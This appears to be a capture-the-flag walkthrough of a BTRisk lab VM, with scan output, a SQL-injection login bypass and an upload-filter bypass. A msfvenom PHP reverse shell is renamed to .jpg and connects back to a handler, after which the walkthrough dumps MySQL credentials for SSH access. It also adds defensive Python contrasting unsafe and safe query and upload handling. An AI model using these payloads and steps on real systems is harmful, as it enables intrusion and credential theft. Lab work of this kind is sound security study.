1. Gather information about the target machine
nmap -sV 192.168.222.131
***
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-20 03:09 EDT
Nmap scan report for localhost (192.168.222.131)
Host is up (0.000067s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 00:0C:29:97:47:75 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.92 seconds
***

[Screenshot: nmap -sV output]

nmap -A -v -T4 192.168.222.131

***
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-20 03:11 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:11
Completed NSE at 03:11, 0.00s elapsed
Initiating NSE at 03:11
Completed NSE at 03:11, 0.00s elapsed
Initiating NSE at 03:11
Completed NSE at 03:11, 0.00s elapsed
Initiating ARP Ping Scan at 03:11
Scanning 192.168.222.131 [1 port]
Completed ARP Ping Scan at 03:11, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:11
Completed Parallel DNS resolution of 1 host. at 03:11, 0.00s elapsed
Initiating SYN Stealth Scan at 03:11
Scanning localhost (192.168.222.131) [1000 ports]
Discovered open port 80/tcp on 192.168.222.131
Discovered open port 21/tcp on 192.168.222.131
Discovered open port 22/tcp on 192.168.222.131
Completed SYN Stealth Scan at 03:11, 0.12s elapsed (1000 total ports)
Initiating Service scan at 03:11
Scanning 3 services on localhost (192.168.222.131)
Completed Service scan at 03:11, 6.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against localhost (192.168.222.131)
NSE: Script scanning 192.168.222.131.
Initiating NSE at 03:11
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 03:11, 3.51s elapsed
Initiating NSE at 03:11
Completed NSE at 03:11, 0.00s elapsed
Initiating NSE at 03:11
Completed NSE at 03:11, 0.00s elapsed
Nmap scan report for localhost (192.168.222.131)
Host is up (0.00014s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.222.128
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 600
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: BTRisk
MAC Address: 00:0C:29:97:47:75 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.249 days (since Tue Oct 19 21:13:36 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.14 ms localhost (192.168.222.131)

NSE: Script Post-scanning.
Initiating NSE at 03:11
Completed NSE at 03:11, 0.00s elapsed
Initiating NSE at 03:11
Completed NSE at 03:11, 0.00s elapsed
Initiating NSE at 03:11
Completed NSE at 03:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.41 seconds
     Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.290KB)
***

[Screenshot: nmap -A output]

2. Port 80 is open, so scan the web directories
dirb http://192.168.222.131

***
-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Oct 20 03:21:34 2021
URL_BASE: http://192.168.222.131/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.222.131/ ----
==> DIRECTORY: http://192.168.222.131/assets/
+ http://192.168.222.131/index.php (CODE:200|SIZE:758)
==> DIRECTORY: http://192.168.222.131/javascript/
+ http://192.168.222.131/server-status (CODE:403|SIZE:295)
==> DIRECTORY: http://192.168.222.131/uploads/

---- Entering directory: http://192.168.222.131/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.222.131/javascript/ ----
==> DIRECTORY: http://192.168.222.131/javascript/jquery/

---- Entering directory: http://192.168.222.131/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.222.131/javascript/jquery/ ----
+ http://192.168.222.131/javascript/jquery/jquery (CODE:200|SIZE:252879)
+ http://192.168.222.131/javascript/jquery/version (CODE:200|SIZE:5)

-----------------
END_TIME: Wed Oct 20 03:21:42 2021
DOWNLOADED: 13836 - FOUND: 4

***

[Screenshot: dirb output]

nikto -host IP:PORT (if the port is 80, the port number can be omitted)
nikto -host 192.168.222.131

***
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.222.131
+ Target Hostname:    192.168.222.131
+ Target Port:        80
+ Start Time:         2021-10-20 03:25:17 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
 # PHP configuration file; it may hold the SQL account name and password
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2021-10-20 03:26:10 (GMT-4) (53 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested 
***

[Screenshot: nikto output]

3. Log in on the target's login page

[Screenshot: login page]

[Screenshot: intercepted login JavaScript]

The script stores the username in the variable user and the password in pwd. str is the substring of user that starts one character after the last @ in the username and runs to the end of user.

Notice the check pwd == "'": if the password is a single quote, the page shows a "hacker" message. This points to SQL injection, so use fuzzing to test whether the login is injectable.

Bypassing the login authentication

The web fuzzing wordlists are under /usr/share/wordlists/wfuzz

[Screenshot: wfuzz]

Brute-forcing with Burp

[Screenshot: Burp brute force]

The brute force turns up some SQL-injection password strings.

[Screenshot: recovered passwords]

Open the link in Burp's browser:

http://burp/show/2/z04tysv5yakgkqk89wm5h4owdubpursu

[Screenshot: visiting the link]

[Screenshot: login successful]
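The login check above runs in the browser and only refuses a lone quote; the real weakness is how the server builds its query. The following Python example is added here and is not code from the target or from the original writeup. It contrasts a query built by string concatenation (the pattern the login page's behaviour suggests) with a parameterised one, against a constructed in-memory SQLite table; the table, the user admin and its password are invented sample data. It generalises the page's observation: any client-side filter can be edited or skipped, so only the server-side fix counts.

```python
import sqlite3

# Constructed demo table, not the target's schema: one user with a plaintext
# password so the comparison is visible (a real application stores a salted hash).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (name TEXT, pwd TEXT)")
    conn.execute("INSERT INTO user VALUES ('admin', 'S3cretPass!')")
    conn.commit()
    return conn

def client_side_check(pwd):
    # Mirrors the intercepted JavaScript: only a password that is exactly one
    # single quote is refused with the "hacker" message. It runs in the
    # visitor's browser, so it can be edited or skipped and protects nothing.
    return pwd != "'"

def login_concat(conn, user, pwd):
    # Query assembled by string concatenation (assumed server-side pattern):
    # a quote in the input becomes SQL syntax instead of data.
    sql = f"SELECT name FROM user WHERE name = '{user}' AND pwd = '{pwd}'"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        # A lone quote breaks the statement; that error is what the
        # client-side check hides instead of fixing.
        return False

def login_param(conn, user, pwd):
    # Parameterised query: the driver binds the values, so the same input is
    # compared as a literal string and is never parsed as SQL.
    sql = "SELECT name FROM user WHERE name = ? AND pwd = ?"
    return conn.execute(sql, (user, pwd)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    tautology = "' OR '1'='1"   # constructed input that is not a lone quote
    print("client-side check passes it:", client_side_check(tautology))
    print("concatenated query accepts it:", login_concat(db, "admin", tautology))
    print("parameterised query rejects it:", not login_param(db, "admin", tautology))
```

The parameterised version needs no input filtering to reject the injected string, and it also returns a clean "no match" for the lone quote rather than a database error. Detection-wise, a burst of login attempts whose password field contains quotes or SQL keywords, as the fuzzing step produces, is a clear signal in web server logs.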

4. The page after login is a file upload page

It does not accept a PHP file.

[Screenshot: upload check]

Only jpg is accepted; the page restricts what can be uploaded.

Upload the PHP file by intercepting the request and modifying it.

Use msf to generate a reverse shell:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.222.128 lport=4444 -f raw > /root/shell.php
lhost is the local attacking machine, lport is the listening port, and /root/shell.php is the output path and filename.
Edit the shell and delete the comment markers.

[Screenshot: generating the PHP payload]

[Screenshot: editing the shell]

Rename shell.php to shell.jpg               # to get past the validation
Then intercept the upload with Burp Suite and modify it to bypass the check.
The upload succeeds.

[Screenshot: renaming the file]

[Screenshot: changing the extension]

[Screenshot: upload successful]
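The upload check described above is defeated by renaming the file and editing the request because it trusts values the client controls. The following Python example is added here and is not code from the target or from the writeup. It shows an assumed model of such a weak check beside a hardened one that validates the extension against an allowlist, requires the file's leading bytes to match that format, and stores the file under a random name; the sample filenames and byte strings are constructed.

```python
import os
import secrets

# Allowed image extensions and the leading bytes ("magic") each format starts with.
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

def weak_check(filename, content_type):
    # Assumed behaviour of the target's check: it trusts the filename extension
    # and the Content-Type the browser sent. Both are attacker controlled, which
    # is why shell.php renamed to shell.jpg and edited in Burp gets through.
    ext = os.path.splitext(filename)[1].lower()
    return ext in ALLOWED and content_type.startswith("image/")

def strong_check(filename, data):
    # Hardened version: exactly one extension, from an allowlist, and content
    # that actually starts like that format. Returns (ok, reason).
    stem, ext = os.path.splitext(os.path.basename(filename))
    ext = ext.lower()
    if ext not in ALLOWED:
        return False, "extension not allowed"
    if "." in stem:
        # shell.php.jpg style names: some server configurations map every
        # extension in the name to a handler, so refuse them outright.
        return False, "multiple extensions"
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, "content does not match extension"
    return True, "ok"

def stored_name(ext):
    # Never keep the client's name: the saved file gets a random name, and the
    # directory it lands in must not be served with script execution enabled.
    return secrets.token_hex(16) + ext

def handle_upload(filename, content_type, data):
    # content_type is accepted for logging only; it plays no part in the decision.
    ok, reason = strong_check(filename, data)
    if not ok:
        return None, reason
    return stored_name(os.path.splitext(filename)[1].lower()), "stored"

# Constructed samples: PHP text renamed to .jpg, and the first bytes of a real JPEG.
PHP_AS_JPG = ("shell.jpg", "image/jpeg", b"<?php echo 'not an image'; ?>")
REAL_JPEG = ("photo.jpg", "image/jpeg", b"\xff\xd8\xff\xe0\x00\x10JFIF\x00")

if __name__ == "__main__":
    for name, ctype, data in (PHP_AS_JPG, REAL_JPEG):
        print(name, "weak:", weak_check(name, ctype), "strong:", strong_check(name, data))
```

A magic-byte check alone is not sufficient: a valid JPEG with PHP appended still begins with FF D8 FF. The control that actually removes the risk is that the upload directory is never served with script execution, so a file that slips through is returned as data rather than run; the listable /uploads/ directory reported by dirb is also worth closing, since it lets anyone locate what was uploaded.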

Catch the reverse shell by listening on the port

1) Set up the listener with msf

msfconsole                //launch msf
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp             //set the payload
set lhost 192.168.222.128                      //IP address the shell connects back to
set lport 4444                                    //port the shell connects back to


In the browser, open the uploaded payload page.


The reverse shell connects back.


sysinfo           //show the system configuration
Look at the config.php configuration file.
It reveals the MySQL account name and password.


mysql -u root -p      //log in to mysql
show databases;   //view the databases; this fails, the privileges are insufficient
python -c "import pty;pty.spawn('/bin/bash')"     //Python's pty module spawns a native terminal with a single line of script
Use the native terminal to log in to mysql and view its contents:
mysql -u root -p
Enter the password: toor
show databases;               //list the current databases
use  deneme;              //switch to the deneme database
select * from user;           //view the rows in the table
The usernames and passwords are visible.
Log in with ssh.
